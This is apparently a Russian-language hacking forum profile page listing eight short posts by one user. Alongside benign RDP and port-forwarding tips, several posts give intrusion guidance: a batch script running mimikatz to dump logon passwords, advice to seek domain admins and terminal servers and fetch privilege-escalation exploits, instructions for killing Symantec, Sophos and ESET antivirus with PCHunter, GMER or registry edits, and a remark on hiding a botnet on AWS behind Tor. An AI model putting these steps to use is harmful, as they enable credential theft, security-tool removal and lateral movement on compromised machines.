Перейти к содержанию

moonden

Пользователь
  • Публикаций

    8
  • Зарегистрирован

  • Посещение

Репутация

16 Good

Информация о moonden

  • Звание
    Rank №1
  1. PCHunter вкладка "Kernel Module", сортировать по столбику "File Corporation", везде где написано Symantec жмешь ПКМ -->> Delete Driver(Fi|e) Потом ребут
  2. удалено

    По-моему как раз в стандартной больше всего настроек, просто многие лежат в файле настроек Default.rdp. По умолчанию он находится в C:\Users\%username%\Documents. Найди строчку session bpp:i: и измени на session bpp:i:8. Так же можно уменьшить разрешение и отключить все галки во вкладке "Взаимодействие", кроме кеширования. Главное, после того как поставишь session bpp:i:8, не переключаться на вкладку "Экран", ибо битность опять 15-16 станет.
  3. Вероятно он имеет ввиду хомячков, они как правило все админы
  4. Кто на aws ботнет размещал?

    Махом прикроют, опыт имеется. Если только через тор. Казнить нельзя помиловать...
  5. открыть порт

    Можно! И на компе(файерволе) и на роутере, вопрос только пропускает ли провайдер. Тут либо провайдеру звонить, либо самому пробовать, например, на 2ip есть проверка. А динамический IP легко обойти с помощью сервисов, типа no-ip, changeip, dyndns etc.
  6. Вопрос WIN RDP

    У меня запускалась. Помню есет тоже блокировал, скачал последнюю версию и вуаля. Попробуй так. На некоторых аверах GMER помогает. Или службу авера им удалить, или в реестре в ветке HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services поудалять сервисы софоса и ребут.
  7. Вопрос WIN RDP

    Тогда не ясна причина создания темы
  8. Вопрос WIN RDP

    Качаешь mimikatz, создаешь батник: Скрытый текст %~d0 cd /D "%~p0" if exist %windir%\SysWOW64\taskmgr.exe (goto x64) cd Win32 mimikatz "privilege::debug" "sekurlsa::logonPasswords" "exit" > pss.txt start pass.txt goto exit :x64 cd x64 mimikatz "privilege::debug" "sekurlsa::logonPasswords" "exit" > pss.txt start pass.txt :exit запускаешь ПКМ от админа. Если параллельно сидит доменный админ, то считай удача, ежели только юзер, ищешь терминальный сервер (обычно в имени что-то вроде "TS", "Term", "Serv" etc) ломишься туда и гоу сплоиты качать Windows Privilege Escalation Удобно убивать аверы PCHuner, на руборде подробное обсуждение проги. Там тебе нужны первые две вкладки. Убиваешь и удаляешь все, где есть слово sophos. Удачи
×